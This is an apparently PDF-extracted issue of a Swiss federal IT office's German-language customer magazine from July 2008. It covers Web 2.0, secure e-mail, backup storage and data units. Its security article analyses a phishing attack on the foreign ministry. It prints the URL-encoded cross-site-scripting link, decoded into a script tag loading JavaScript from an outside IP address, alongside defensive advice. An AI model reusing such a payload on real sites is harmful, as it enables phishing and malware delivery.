Information Web 2.0 - Bundesamt für Informatik und
Transcrição
Information Web 2.0 - Bundesamt für Informatik und
www.bit.admin.ch Eisbrecher Die Kundenzeitung des BIT Nr. 30 | Juli 2008 Web 2.0: Eine kurze Geschichte seiner Entwicklung Seite 15 IT-Sicherheit: E-Mail-Attacke auf das EDA Seite 4 GPS: Satelliten weisen den Weg Seite 13 Industrie Information Information Web 1.0 Web Schweizerische Eidgenossenschaft Confédération suisse Confederazione Svizzera Confederaziun svizra 1.0 Web 2.0 Web 2.0 Web 3.0 Web 3.0 Web 4.0 Web 4.0 Eidgenössisches Finanzdepartement EFD Département fédéral des finances DFF Bundesamt für Informatik und Telekommunikation BIT Office fédéral de l'informatique et de la télécommunication OFIT 2 Inhalt Web 2.0: Eine kurze Geschichte seiner Entwicklung Seite 15 Editorial 3 IT-Thema 4 IT-Sicherheit: Im Posteingang lauert Ungemach 7 Interview: «Vorsicht bei HTML-Mails» Produkte und Projekte 8 IncaMail: Eingeschrieben und sicher 9 Storage: Bundesverwaltung speichert sicher 12 Hardware-Recycling: IT-Altmaterial verkauft sich gut IT-Sicherheit: E-Mail-Attacke auf das EDA Seite 4 Eingeschoben 13 GPS und Co.: Orientierung total 15 Web 2.0: Eine vernetzte Geschichte Events 17 PR-Leute bloggen im BIT 18 «BIT in Action»: Infos aus erster Hand Bits & Bytes 20 FAQ; Kurz notiert 21 Kurz gelesen; Trendreport 22 SMS-Interview 23 Mixed Pixels; BIT-Kontakt-Box GPS: Satelliten weisen den Weg Seite 13 Herausgeber Bundesamt für Informatik und Telekommunikation (BIT) Monbijoustrasse 74, CH-3003 Bern Telefon +41 31 325 90 11 Intranet: http://intranet.bit.admin.ch Internet: www.bit.admin.ch Redaktionsleitung Nora Kelemen Der Heftumschlag zeigt die Ko-Evolution von Mensch und Computer. Mehr darüber ab Seite 15. Redaktion Leo Hauser (HL), Ernst Schlumpf (SErn), Marc Bärtschi (MB). Redaktionelle Mitarbeit an dieser Ausgabe: Jose Klee (KlJ) Gestaltung Stefan Flükiger (Flu) Druck BBL, Vertrieb Publikationen, Bern Online-Version und Abonnement www.bit.admin.ch/eisbrecher Kontakt [email protected] Tel.: +41 31 323 38 47 Nächste Ausgabe September 2008 EDITORIAL 3 Ihre Mitmach-Zeitung Liebe Leserin, lieber Leser Nora Kelemen Bereichsleiterin Kundenkommunikation 031 323 38 47 Web 2.0 ist das Mitmach-Web. Tauchen Sie mit uns darin ein! Das Spektrum der Inhalte, welche von Webnutzern für ihresgleichen zusammengetragen wurden, ist immens. Wikipedia, YouTube und Flickr sind dabei die bekannteren Sites. Um Ihnen das Eintauchen zu erleichtern, geht der «Eisbrecher» online. Auf www.bit.admin.ch/ eisbrecher finden Sie eine nach Nutzungsgesichtspunkten gruppierte Linkliste (Wissen, Tools, Social networking, Sharing, Design it yourself, Food & Beverage, Community, Reisen, Podcasting, Fotos & Videos, Nachrichten). Für moderne Zeitgenossen gehört solch ein Tauchgang fast schon zur, zugegeben vergnüglichen Pflicht. Unser Lieblingslink ist übrigens die «Web Trend Map». Ein bisschen Zeit erfordert das Betrachten dieser Karte schon, doch es lohnt sich, denn sie gibt Übersicht, zeigt Zusammenhänge und ist darüber hinaus auch ein echter Augenschmaus. In dieser Ausgabe erzählt der «Eisbrecher» die Geschichte vom Urmenschen, der zum WebSurfer mutierte. Wir erlauben uns dabei einen spielerischen Umgang mit dem trendigen Webjargon und wagen einen Ausblick auf Web 4.0 (Seite 15). Wasser, wird es uns an der Wasserkante wie geknickt erscheinen. Der Teil unterhalb der Wasserkante wird grösser aussehen, als derjenige oberhalb. Unser Auge sieht unter Wasser alles ungefähr um ein Viertel näher. Nun haben Sie möglicherweise in der «Computerworld» den interessanten Artikel «Die Bundesverwaltung speichert sicher» gelesen (falls nicht: Wir drucken ihn in diesem «Eisbrecher» nochmals ab). Können Sie aber auch die kniffligste aller Alltagsfragen zum Thema Speichern beantworten: Warum zeigt der Computer bei einem DVD-Rohling mit 4.7 GB Speicherplatz bloss 4.38 GB an? Der «Eisbrecher» bringt uns die Sache näher und gibt Antwort. Ab Seite 9. Gegen Ende des Tauchgangs informiert Sie Ihr GPS zuverlässig, welche Koralle Sie sich unbedingt noch anschauen sollten und welche Strömung Sie schliesslich sicher nach Hause führt. Der «Eisbrecher» erklärt, wie GPS funktioniert, was man mit GPS-Handys alles finden kann und was ein Ortungssystem auf WLAN-Basis in Zukunft alles bringen könnte (Seite 13). Eine vergnügliche Lektüre wünschen Am schönsten ist es beim Tauchen, wenn man diesen ganz speziellen Schwebezustand erreicht: es ist ganz still, man ist entspannt und völlig ausgeglichen. In diesem ausbalancierten Zustand halten sich der eigene Auftrieb und die eigene Gewichtsverdrängung exakt die Waage. Leider ist dieses Austarieren gar nicht so einfach, zu leicht gerät die Balance ins Wanken. Das kann auch im Mitmach-Web geschehen. Ein harmlos erscheinender Aufruf an EDA-Mitarbeitende zur Beteiligung an einem Online-Foto-Wettbewerb entpuppte sich bald als Hacker-Angriff. Wie dann alles wieder ins Lot gebracht wurde und mit was für Angriffen potenziell noch zu rechnen ist, erfahren Sie ab Seite 4. Unter Wasser erscheint uns alles viel näher, was ein simples Experiment mit einem Wasserglas belegt. Taucht man ein Cocktail-Stäbchen ins Nora Kelemen und das «Eisbrecher»-Team P.S.: Den «Eisbrecher» gibt’s auch als PDF-Download, nur für den Fall, dass Sie gar nicht mehr aus dem Web 2.0 auftauchen mögen. Siehe www.bit.admin.ch/eisbrecher. IT-Thema 4 IT-Sicherheit Im Posteingang lauert Ungemach Hacker führten im vergangenen November eine gezielte Virus-Attacke gegen das EDA durch, wohl mit dem Ziel an vertrauliche Informationen zu gelangen. Dank sofortiger Hinweise von aufmerksamen Mitarbeitenden ist der Angriff glimpflich abgelaufen. Doch ohne Zweifel wird es weitere Versuche geben, die Bundes-IT zu schädigen. BIT-Kontakt: Stefan Neuenschwander, Informatiksicherheitsbeauftragter 031 322 06 17 Text: Leo Hauser Foto: Leo Hauser, Stefan Flükiger Böse «Käfer» gelangen heute nicht mehr so oft direkt als E-Mail-Attachment auf den Rechner. Dafür landen im Posteingang zunehmend E-Mails mit Links zu Webseiten, die Schadsoftware enthalten. Es begann unverfänglich mit einer Einladung an über 500 Mitarbeitende im EDA. Die persönlich adressierten E-Mails trugen das vertraute Logo der Schweizerischen Eidgenossenschaft und riefen zur Teilnahme an einem Foto-Rating auf: Auf einer Webseite des Staatssekretariats für Wirtschaft (SECO) sollten die besten Einsendungen eines Amateur-Fotowettbewerbs unter Bundesmitarbeitenden bewertet und der Sieger oder die Siegerin erkoren werden – eine Art unverdächtiges Mitmachweb. Wer seine Stimme abgeben wollte und den angegebenen Link in der E-Mail anklickte, glaubte die Wettbewerbs-Webseite des SECO vor sich zu haben. Was die Besucherinnen und Besucher jedoch nicht wissen konnten: Die SECO-Seite war gefälscht! Wollte man sich die vermeintlichen Fotos genauer ansehen, lud man sich nichts ahnend eine Schadsoftware auf den Rechner. Selbstverständlich war auch der Absender gefälscht: Um bei den Empfängern der E-Mail Vertrauen zu erwecken, gaben die Hacker als Absender eine (existierende) E-Mail-Adresse des Schweizer Tourismus-Verbandes vor. Raffinierte Hacker-Technik Aus technischer Sicht handelte es sich bei dem Angriff auf das EDA um ein so genanntes CrossSite-Scripting, kurz XSS. Darunter versteht man IT-Thema 5 das Ausnutzen gewisser Sicherheitslücken auf einer Website, um dort über einen manipulierten Link einen eigenen Javascript-Code einzuschleusen, der dann auf dem Gerät des Opfers ausgeführt wird. Der Angreifer erhält dadurch die Möglichkeit, eigene Webseiteninhalte anzeigen zu lassen, während es für den Benutzer so aussieht, als befände er sich nach wie vor auf der Originalseite. Damit eine derartige Webseiten-Mimikry funktioniert, muss der User dazu gebracht werden, die entsprechende URL zu besuchen. Dies gelingt oft mittels eines Lockvogel-E-Mails wie jenem an die EDA-Mitarbeitenden. Solche E-Mails sind in aller Regel HTML-formatiert, weil sich dadurch die Manipulation am Link problemlos verschleiern lässt. Der XSS-Trick Der verlinkte Text in der HTML-E-Mail lautete «Uebergang zur web-seite zur Stimmabgabe» (sic!). Dahinter verbarg sich folgender Link: http://www.admin.ch/ch/script/printme.php?u h=1339E2D660B3135B:1775C445C06C1713&de= 1DEC54A5&site=%3C%73%63%72%69%70%7 4%20%73%72%63%3D%68%74%74%70%3A %2F%2F%31%39%36%2E%34%36%2E%31% 30%36%2E%37%31%2F%77%65%74%74%2E %6A%73%33C%2F%73%63%72%69%70%74 %3E&_lang=de Obiger Zahlensalat im Klartext ausgedrückt: (...) <script src=http://196.46.106.71/wett.js> Im vorliegenden Fall wurde eine damals noch fehlende Inputvalidierung auf einer Website der Bundesverwaltung ausgenutzt, um das CrossSite-Scripting durchzuführen und die User auf eine gefälschte SECO-Webseite umzuleiten. Die gefälschten SECO-Inhalte wurden im Kontext von www.admin.ch dargestellt, das einzige Element, das effektiv von admin.ch gebraucht, bzw. missbraucht wurde, war jedoch das PHP-Skript «Printme», welches eine Druckversion der jeweiligen Seite generiert (siehe Kasten). Admin.ch wurde also nur als «Reflektor» für die gefälschte SECO-Seite benutzt – ein Hauptmerkmal des Cross-Site-Scriptings. Durch diesen Kniff bleibt sogar die Adresszeile im Browser vertrauenswürdig (beginnend mit «www.admin.ch»). Français Verräterische Schreibfehler Wie die Analyse des EDA-Vorfalls zeigte, verweist der Link in der E-Mail auf das verwundbare «Printme»-Skript und löste dort ein Cross-SiteScripting aus. Dadurch wurde eine JavascriptDatei von einem Server im ostafrikanischen Tansania heruntergeladen. Dieses Skript – es wurde sofort nach dem Angriff XSS-untauglich gemacht – stellte dann die gefälschte SECO-Site dar. Der </script> (...) Der Link bedeutet: Wenn die Seite aufgerufen wird, hole ein Javascript von der Seite 196.46.106.71 mit dem Namen wett.js. auf der Webseite verlinkte Virus wiederum war auf einem Server in Beirut (Libanon) abgelegt. Die Malware tarnte sich als funktionierender Bildschirmschoner, dem die Hacker sogar ein ansprechendes Icon mit Schweizerkreuzchen verpasst hatten. Einmal aktiviert, zeigt der Screensaver Bilder des vermeintlichen Fotowettbewerbs. Im Hintergrund jedoch legte die Schadsoftware auf dem Rechner verschiedene Tasks an, welche sich bei jedem künftigen Logon des Benutzers aktiviert hätten. Die entsprechenden Files, die das Virus auf dem PC platzierte, waren geschützt, für den Benutzer unsichtbar und enthielten die Möglichkeit, mit verschiedenen externen Servern zu kommunizieren, von dort neue Schadsoftware zu laden oder dorthin gesammelte Informationen zu übermitteln. Der Angriff hatte sehr wahrscheinlich das Ziel, an vertrauliche Informationen wie z.B. Passwörter zu gelangen. Menaces sur la boîte de réception En novembre dernier, des pirates ont lancé une attaque de virus ciblée contre le DFAE dans le but de soutirer des informations confidentielles. Grâce à la réaction immédiate de collaborateurs attentifs, l’attaque n’a pas atteint son but. Mais ce n’était certainement pas la dernière tentative de piratage contre le réseau informatique de la Confédération. Vous trouverez la version française de cet article sous www.bit.admin.ch/eisbrecher IT-Thema 6 Die Anlage des Angriffs auf das EDA war raffiniert genug, dass etwa 70 Mitarbeitende sich dazu verleiten liessen, beim angeblichen BilderRating mitzumachen – wodurch sich das Virus auf ihren PCs einnisten konnte. Einigen Mitarbeitenden kamen jedoch zu Recht die holprigen Formulierungen und die vielen Schreibfehler in der Einladungs-E-Mail und auf der WettbewerbsWebseite suspekt vor. So war unter anderem von eidgenössischen «Zivilbeamten» die Rede, ein Begriff, der in der Bundesverwaltung nicht gebräuchlich ist. Auch hatten die Verfasser der Texte offenbar keine Tastatur mit Umlauten zur Verfügung. Dank der umgehenden Meldung beim HelpDesk des EDA konnten die IT-Spezialisten rasch intervenieren und dadurch grösseren Schaden verhindern. Die ca. 70 verseuchten Geräte konnten rasch identifiziert werden. Sie wurden gesperrt und neu aufgesetzt. Alle betroffenen Anwenderinnen und Anwender mussten ihre Passwörter ändern. Doch der nächste Angriff kommt bestimmt (siehe auch nebenstehendes Interview): Gemäss der Melde- und Analysestelle Informationssicherung MELANI (www.melani. admin.ch) lässt die aufwändige Art des Angriffs aufs EDA auf eine professionelle und mit einigen finanziellen und technischen Mitteln ausgestattete Täterschaft schliessen. Screenshot der gefälschten SECO-Website. Die gesamte Site wurde mittels JavaScript von einem Server in Tansania geladen. Mit einem Klick auf «Schauen» lud man sich nichts ahnend die Malware herunter. Das Design der Site entspricht dem Corporate Design des Bundes, verdächtig sind jedoch die zahlreichen sprachlichen Schnitzer im Text. IT-Thema 7 «Vorsicht bei HTML-Mails» Reto Inversini, Informationssystem-Architekt/ Security im BIT, über gefährliche Mails und Webseiten. Eisbrecher: Kommen Angriffe auf die Bundes-IT häufig vor? Reto Inversini: Angriffe werden immer gezielter durchgeführt und haben neben Informationsbeschaffung vor allem wirtschaftliche Ziele. Grosse Virenausbrüche mit dem Ziel, die Verfügbarkeit einzuschränken, kommen kaum mehr vor. Stattdessen zielen die Angriffe darauf ab, möglichst unbemerkt die Kontrolle über ein Gerät zu übernehmen. Mit welchem konkreten Ziel? Dabei gibt es folgende drei Hauptbereiche: • Informationsgewinnung (das geht von Passwörtern über Keylogger bis hin zum Abfluss von Firmengeheimnissen sowie Spionagetätigkeit) • Identitätsdiebstahl • Botnetze: Übernommene Geräte werden häufig in ein sogenanntes Botnetz eingereiht. Diese riesigen Verbünde von gekaperten Rechnern – oft mehrere 100 000 Geräte, selten auch mehrere Millionen – werden v.a. für den Versand von Spam- und Phishing-Mails, seltener für DDoS-Angriffe verwendet. (Unter DDoS – Distributed Denial of Service – versteht man einen Angriff auf einen Computer mit dem Ziel, seine Verfügbarkeit zu stören. Im Gegensatz zur DoS-Attacke erfolgt der Angriff von vielen verteilten Rechnern aus. Anm. d. Red.) Woran erkennt man ein potenziell gefährliches E-Mail? Insbesondere Mails in HTML-Format sind mit Vorsicht zu geniessen, das Beispiel des EDA illustriert dies sehr gut. Mails aus unbekannter Quelle sind grundsätzlich mit Shift-Delete direkt zu löschen. Es ist im Grundsatz auch möglich, ein Mail mit admin.ch-Absender zu fälschen und ins Bundesnetz zu senden. Prinzipiell sollte man sich bei jedem Mail kurz überlegen, ob man es erwartet hat und ob der Stil des Schreibenden mit dem erwarteten Stil übereinstimmt. Darf man Links in E-Mails anklicken? Nein, das sollte man nicht tun, ausser man ist sehr sicher, dass das Mail effektiv von der rich- tigen Person stammt, z.B. weil es eine gültige SecureMail-Signatur hat. Reine Textmails sind weniger riskant, weil man dort den gesamten Link sieht. In einem HTML-Mail wird der Link aber unter dem Text verborgen (z.B. «Hier klicken für die BIT-Homepage» ist der Name des Links, darunter verbirgt sich jedoch eine x-beliebige URL, z.B. http://badwebsite.com). Es ist immer besser, einen Link abzutippen oder aus den eigenen Bookmarks zu nehmen. Wie soll man sich verhalten, wenn man eine verdächtige E-Mail erhalten hat? Wenn das Mail keinen Bezug zur Bundesverwaltung hat, löschen Sie es einfach mit Shift-Delete. Wenn das Mail einen Bezug zur Bundesverwaltung oder zu Ihnen als Person vorzuspielen versucht, informieren Sie Ihren Informationssicherheitsbeauftragten (ISBO), speichern Sie das Mail und leiten es danach als Attachment an [email protected] weiter. Was ist zu tun, wenn man den Hackern auf den Leim gekrochen ist und sich eine Malware eingefangen hat? Ziehen Sie das Netzwerkkabel aus Ihrem Computer und informieren Sie das Service Desk BIT, bzw. den Helpdesk Ihrer Organisation. Wo lauert sonst noch im Internet Malware? Malware wird nicht nur per Mail verteilt, sondern immer häufiger auch direkt via Web, z.B. durch bösartige Werbebanner. Immer öfter werden Links auf bösartige Seiten oder Dateien via Instant Messaging zum Benutzer gebracht. Wenn Malware per Mail verteilt wird, ist es sehr oft so, dass nur noch ein Link auf die Site mit der Malware im Mail enthalten ist. Bösartige Dateianhänge werden immer seltener, existieren aber nach wie vor. Keine Schonung für Screensaver Als Massnahme bezüglich des Auftretens von virenverseuchten Bildschirmschonern hat das BIT den Download von Dokumenten mit der Endung .scr (Screensaver) via Webbrowser gesperrt. Diese Filetypen waren auf den Mailservern des Bundes (Outlook, E-Mail) bereits seit Mitte 2004 blockiert. Details: www.ais.admin.ch Produkte & Projekte 8 Elektronisches Einschreiben IncaMail: Eingeschrieben und sicher Inca? Die Ähnlichkeit ist wohl mehr zufällig als gewollt, denn dieses Inca hat weder mit dem berühmten Inca Kaffee noch mit einer Gemeinde auf Mallorca noch mit einem Volk der Anden irgend etwas gemein. Inca, zusammen mit Mail, bezeichnet eine Dienstleistung der Post. Wie viele IT-Bezeichnungen ist auch dieser Begriff Inca ein Kürzel, welches sich aus den vier englischsprachigen, aber durchaus gebräuchlichen Begriffen Integrity (Integrität), Non-repudiability (Nichtabstreitbarkeit), Confidentiality (Vertraulichkeit) und Authenticity (Authentizität) zusammensetzt. In Kombination mit dem Begriff Mail ergibt das dann IncaMail. Sinn und Zweck dieser zeitgemässen und leicht handhabbaren Anwendung: Mails können elektronisch eingeschrieben werden, der Dokumentenverkehr wird damit sicher, nachweisbar und vor allem auch rechtsgültig. BIT-Kontakt: Peter Balsiger, Abteilungsleiter E-Government 031 325 40 43 Text: Ernst Schlumpf «Safety first» Obwohl immer mehr Dokumente elektronisch versandt werden, ist der heutige Mailverkehr immer noch alles andere als sicher. Das gibt zu denken und ruft die Sicherheitsleute auf den Plan, welche den Auftrag haben, im Sinne der Kunden für sichere Übertragungswege zu sorgen. In diesem Kontext hat die Schweizerische Post in Zusammenarbeit mit dem BIT IncaMail entwickelt, eine Lösung mit welcher Verträge, sensible Kundendaten, Kündigungen, Gesundheitsdaten und alle anderen Daten und Dokumente schneller, sicherer und preiswerter verQuittung schickt werden können als auf dem physischen Weg. Voraussetzung für ein funktionierendes IncaMail sind Zertifikate, Client-Applikationen und ein IncaMail-Account für Sender und Empfänger. Dank der vom BIT betriebenen Public Key Infrastructure (Admin PKI), welche die entsprechenden Zertifikate zur Verfügung stellt, ist eine hochwertige, elektronische Kommunikation garantiert. IncaMail in der Praxis In der praktischen Anwendung wird eine Nachricht (mit allfälligen Begleitdokumenten) automatisch mit dem Zertifikat des Absenders signiert und mit dem Schlüssel des Empfängers verschlüsselt. Die Nachricht geht via Internet an die IncaMail-Plattform der Post und legt sich dort ins Postfach des Empfängers. Der Post-Server informiert den Empfänger über die Sendung. Dieser Adressat ist der einzige, der authorisiert ist, die Nachricht zu entschlüsseln. Sie muss zudem innerhalb einer präzise definierten Frist abgeholt sein. Holt der Adressat sie nicht ab, wird sie gelöscht und Absender und Empfänger werden informiert. Holt er sie ab, wird die Datei geprüft und beim Download automatisch entschlüsselt. Eine Quittung bestätigt diesen gesamten Prozess und macht ihn damit sauber nachvollziehbar und für die registrierten Inhaber der IncaMailAccounts rechtlich verbindlich. Links Abhol-Frist Die Produktwebsite der Schweizerischen Post für den sicheren Austausch von elektonischen Daten www.incamail.ch Informationen zur Admin PKI http://intranet.bit.admin.ch/adminpki ho Informations-Mail lu n g Empfänger Ve rs a nd Ab [inca] Mail Informations-Mail Sender Versand-Datum Abhol-Datum Lösch-Datum t Produkte & Projekte 9 Storage Bundesverwaltung speichert sicher Die enorme Zunahme unstrukturierter Daten erschwerte beim BIT die Datensicherung. Mit der Einführung einer neuen Backup-Software ist das BIT nun wieder auf der sicheren Seite. Artikel aus der Zeitschrift «Computerworld» Nr. 13/2008. Abdruck mit freundlicher Genehmigung der Redaktion. BIT-Kontakt: Stefan Kälin, Bereichsleiter Storage 031 325 93 18 Text: Claudia Bardola («Computerworld») Foto: Leo Hauser Die steigende Datenflut in Unternehmen und Organisation wird heute vor allem durch unstrukturierte Daten verursacht: Mittlerweile liegt nicht einmal die Hälfte aller Daten in strukturierter Form in Datenbanken und Geschäftsapplikationen vor. Der Rest verteilt sich grösstenteils unstrukturiert auf E-Mail- und MessagingSysteme und Office-Dateien. Diese Entwicklung bereitete auch Stefan Kälin, Bereichsleiter Storage beim BIT, zunehmend Kopfzerbrechen. «Die Zunahme unstrukturierter Daten gestaltete sich dramatisch. Dabei machte uns aber weniger der Speicherplatz als vielmehr die Datensicherung Sorgen.» So reichte das für das Backup angelegte Zeitfenster am Wochenende kaum noch aus. Zudem waren es auch die Backup-Kosten, die Kälin nachdenklich werden liessen: Teurer Primärspeicher wurde durch die redundante Ablage von Daten, insbesondere von E-Mail-Anhängen, belegt. Der installierte Speicherplatz beim BIT beträgt mehr als 511 Terabyte. Monatlich kommt im Schnitt mehr als 1 Terabyte (1 Terabyte = 1 Million Megabyte) hinzu. Für Kälin stand fest, dass die bestehende Datensicherungs-Software den Anforderungen nicht länger würde genügen können und daher dringend abgelöst werden musste. Mit seinem Team schrieb er das Projekt gemäss den Vorgaben der Welthandelsorganisation (WTO) aus. Die sorgfältige Evaluation der Angebote führte zu einer Shortlist von drei Anbietern. Bei der Entscheidungsfindung hatte sich die Crew bewusst Zeit genommen: Von jedem Tool wurde eine Test-installation aufgesetzt, die während eines Jahres gründlich geprüft wurde. «Die Produkte lagen dicht beieinander», erinnert sich Kälin. Am Ende erhielt Veritas NetBackup von Symantec den Zuschlag. Zwei Gründe waren entscheidend: NetBackup kam besser mit heterogenen Umgebungen und der dadurch notwendigen Unterstützung unterschiedlicher Betriebssystemderivate zurecht. Zudem punktete die Software mit umfangreicher Funktionalität. Français Hat den Durchblick: Stefan Kälin, Bereichsleiter Storage. Jede einzelne «Kassette» dieser Tape Library im BIT-Rechenzentrum fasst 1,5 Terabyte an Daten. Heterogene Infrastruktur Vor allem die Unterstützung heterogener Umgebungen war wichtig. Denn grundsätzlich sieht das Konzept des BIT drei Stockage des données: l’administration fédérale assure La sauvegarde des données à l’OFIT devenait difficile en raison de la croissance énorme des données non structurées. Avec l’introduction d’un nouveau logiciel de backup, l’OFIT peut à nouveau stocker les données en toute sécurité. Vous trouverez la version française de cet article sous www.bit.admin.ch/eisbrecher Produkte & Projekte 10 Reis Speicher-Systeme 0 1 Bit 1 Reiskorn 0010 0000 1Byte 8 Reiskörner 5 KB Standorte für die Rechenzentren vor: Das Hauptrechenzentrum im so genannten «Titanic II»Gebäude in Bern, ein Backup-Rechenzentrum in knapp fünf Kilometer Entfernung sowie ein militärisch geschützter Disaster-Recovery-Standort, der etwa 100 km entfernt ist. Alle Standorte sind über redundante Höchstgeschwindigkeitsleitungen miteinander verbunden. 1.2 kg Das aktuelle Konzept hat seinen Ursprung in der Entscheidung des Bundes aus dem Jahr 2000, die Anzahl der damals 75 Informatikabteilungen auf Departementsstufe auf sieben zu konsolidieren. «Damit», erinnert sich Stefan Kälin, «bekamen wir ganz unterschiedliche Systemarchitekturen ins Haus, angefangen bei den Betriebssystemderivaten bis hin zu den Speichersystemen.» Davon ist heute nicht mehr viel übrig. Die Standardisierung aller Komponenten wurde und wird konsequent vorangetrieben. Die Integrationsaufgaben durch das Insourcing der Departemente umfasste auch die Backup-Software. 2 Reispackungen à 600 g 5 MB 1.2 t Musiksong mp3 40 Reissäcke à 30kg 750 MB 180 t CD 3.7 Schiffscontainer à 2.44 x 2.59 x 12.2m 1 GB 240 t Memorystick 4.9 Schiffscontainer à 2.44 x 2.59 x 12.2m 100 GB 489 x 24‘000 t 1 TB 240‘000 t Frachtschiff mit 4899 Containern Externe Harddisk 300 TB Zentrales Disk-Speichersystem 72 Mt 300 Frachtschiffe mit 1‘469‘822 Containern Der Reisrechner Ein König wollte den Erfinder des Schachbretts entlohnen und fragte nach seinem Wunsch. Der weise Brahmane antwortete: «Ich wünsche mir ein Reiskorn auf das erste Spielfeld und auf jedes folgende Feld immer die doppelte Anzahl Reiskörner des vorhergehenden Feldes. Der König willigte ein – und musste bald die Unerfüllbarkeit dieses Wunsches einsehen. Es hätte 18 446 744 073 709 551 615 Reiskörner gebraucht: 553 Gigatonnen Reis! Wie die Reiskörner auf dem Schachbrett nimmt auch die Datenmenge stetig zu, wie der «Reisrechner» veranschaulicht: Entspricht ein Bit (kleinste darstellbare Datenmenge) einem Reiskorn, so entspricht bereits der Inhalt einer einzigen CD dem Inhalt von 3 Schiffscontainern. Idee und Kreation: Musqueteers GmbH - Kompanie für Kommunikation für Hitachi Data Systems AG Schiffscontainer à 2.44 x 2.59 x 12.2m Laptop Elegantes Backup Die Speicherinfrastruktur des BIT ist vollkommen symmetrisch aufgebaut. Primär- und Sekundärstandort sind über eine DWDM-Verbindung gekoppelt (DWDM = Dense Wavelength Division Multiplexing; ermöglicht Netze mit extrem hoher Übertragungskapazität). Als Backup sind beide Standorte zudem mit einem Gigabit-IP-Backbone verbunden. Die veränderten Daten werden gleichzeitig an beiden Standorten auf identische Tape Libraries geschrieben. «Das erledigt NetBackup nun sehr elegant», ist Stefan Kälin zufrieden. In dieses Sicherungskonzept sind auch alle Daten von Applikationen eingeschlossen, für die ein erhöhter Schutzbedarf im Projekt Katastrophenvorsorge für die Bundesverwaltung definiert wurde. Dazu gehören beispielsweise die E-Mails. Diese Daten werden mehrfach am Tag über das Gigabit-Netz vom Primärstandort an den Sekundärstandort gespiegelt und von dort aus auf Band gesichert. NetBackup macht täglich eine inkrementelle Datensicherung (auch Zuwachssicherung genannt) der am selben Tag geänderten Daten. Diese Sicherungsbänder bleiben sieben Tage erhalten, bevor sie wieder überschrieben werden. Wöchentlich findet eine Vollsicherung statt, die drei Wochen aufbewahrt wird. Dazu kommt eine monatliche Vollsicherung, die erst nach 90 Tagen wieder überschrieben werden darf. «Dies sind Produkte & Projekte 11 die Standardfälle», erklärt Stefan Kälin. «Andere Sicherungszyklen lassen sich mit NetBackup natürlich ohne Problem einrichten. Das liegt allein an den Anforderungen unserer Kunden.» Wie viele Bytes sind ein Gigabyte? Man kennt das: Auf der Verpackung verspricht die externe Festplatte ein Fassungsvermögen von 500 Gigabytes (GB), doch nach dem Kauf meldet das Betriebssystem des PCs bloss deren 466. Dasselbe beim Clevere Speicherhierarchien Das Problem mit der redundanten Datenspeicherung auf teuren Primärspeichern hat Kälin ebenfalls gelöst. Es kommt nun eine ILM-Strategie (ILM = Information Lifecycle Management) zum Tragen, nach der Daten ihrer Bedeutung gemäss auf das jeweils geeignete Speichermedium verschoben werden. Daten älter als beispielsweise drei Monate werden automatisch auf billigen Speicher übertragen. «Wir haben eine Speicherhierarchie aus High-end-, Mid-range- und Low-cost-Systemen eingerichtet», sagt Kälin. «Im Low-cost-Bereich streben wir Kosten von 10 Rappen pro Gigabyte und Monat an.» Dank dieser Speicherhierarchie verkleinert sich das BackupVolumen deutlich. DVD-Rohling mit seinen angeblichen 4,7 GB Speichervermögen: Legt man den Rohling ins Laufwerk zeigt der PC plötzlich nur noch 4,38 GB an. Eine Mogelpackung? Die Erklärung: Hersteller von Speicherplatten und DVD-Rohlingen zählen auf andere Weise als der Computer – und das zu Recht. Denn gemäss Système international d’unités (SI) sind die Präfixe Kilo, Mega, Giga etc. für dezimale Vielfache reserviert. Nach den international anerkannten SI-Regeln entspricht ein Kilobyte (KB) also hochoffiziell 1000 (103) Bytes und ein Megabyte (MB) exakt einer Million (106) Bytes. Und die Hersteller von Festplatten, DVD- und Blu-ray-Disc-Rohlingen tun nichts anderes, als die Präfixe regelkonform zu verwenden. Nicht so der PC: Der rechnet seit eh und je mit binären Vielfachen: Ein KB entspricht für ihn 1024 (210) Bytes, ein MB 1 048 576 (220) Bytes usw. Das BIT hat heute für die Datensicherung mehrere Tape Libraries im Einsatz. «Die PetabyteGrenze (1 Petabyte = 1000 Terabyte, Red.) haben wir längst überschritten», so Stefan Kälin. Auch optische Speichersysteme sind derzeit noch im Einsatz, werden jedoch schon bald durch DiskArchive abgelöst. «Für Archivzwecke sind Disks grundsätzlich gut geeignet», sagt der BIT-Bereichsleiter. «Als Back-up-Medien finden wir sie weniger brauchbar. Das Tape wird uns hier noch lange als preisgünstiges und flexibles Medium erhalten bleiben, vor allem mit den künftigen 2-Terabyte-Kassetten.» Daher steht das BIT-Team dem Konzept der Virtual Tape Library, also DiskSystemen, die sich wie Tapes ansprechen lassen, noch skeptisch gegenüber. Bevor dies in Angriff genommen wird, soll zunächst einmal die volle Funktionalität von NetBackup ausgenutzt werden. In der binären Welt des Computers ist es also in etwa so, wie wenn man eine bestimmte Menge Wasser nicht in standardisierte 1-Liter-Krüge, sondern sie in etwas grössere Krüge abfüllen würde: Das Wasser fände in weniger Krügen Platz. Gleichermassen passen die 500 Milliarden Bytes auf der 500-GB-Festplatte locker in 466 der etwas grösseren «binären Gigabytes» des Computers. Nun, dieses mega Durcheinander müsste nicht sein, verwendete man nur die richtigen Einheiten – die Präfixe Kilo, Mega, Giga usw. also ausschliesslich für dezimale Vielfache. Für binäre Vielfache existieren nämlich eigene Präfixe, die sich in der Praxis aber noch nicht durchgesetzt haben: Sie heissen Kibi (Ki), Mebi (Mi), Gibi (Gi) usw., abgeleitet von den Begriffen Kilobinary, Megabinary, Gigabinary usw. Sinngemäss spricht man von Kibibyte (KiB), Mebibyte (MiB) und Gibibyte (GiB). Zum Vergleich: 1 Kilobyte (KB) = 103 Bytes = 1000 Bytes 1 Kibibyte (KiB) = 210 Bytes = 1024 Bytes 1 Megabyte (MB) = 106 Bytes = 1 000 000 Bytes 1 Mebibyte (MiB) = 220 Bytes = 1 048 576 Bytes 1 Gigabyte (GB) = 109 Bytes = 1 000 000 000 Bytes 1 Gibibyte (GiB) = 230 Bytes = 1 073 741 824 Bytes Das Wichtigste aber: Die Konsumentinnen und Konsumenten werden also nicht übers Ohr gehauen, denn unabhängig von der Zählweise hat’s auf der DVD oder der Festplatte immer gleich viele Bytes Speicherplatz. Système international d’unités (SI) www.bipm.org/fr/si HL Produkte & Projekte 12 Hardware-Recycling IT-Altmaterial verkauft sich gut Das BIT lässt nicht mehr benötigte Hardware über den Onlineshop «Auctionline» einer Zweitnutzung zukommen. Davon können alle Mitarbeitenden der BIT-Kunden und des BIT profitieren. Jetzt wurde das Angebot sogar noch ausgebaut. BIT-Kontakt: Stefan Zweili, Bereichsleiter Delivery 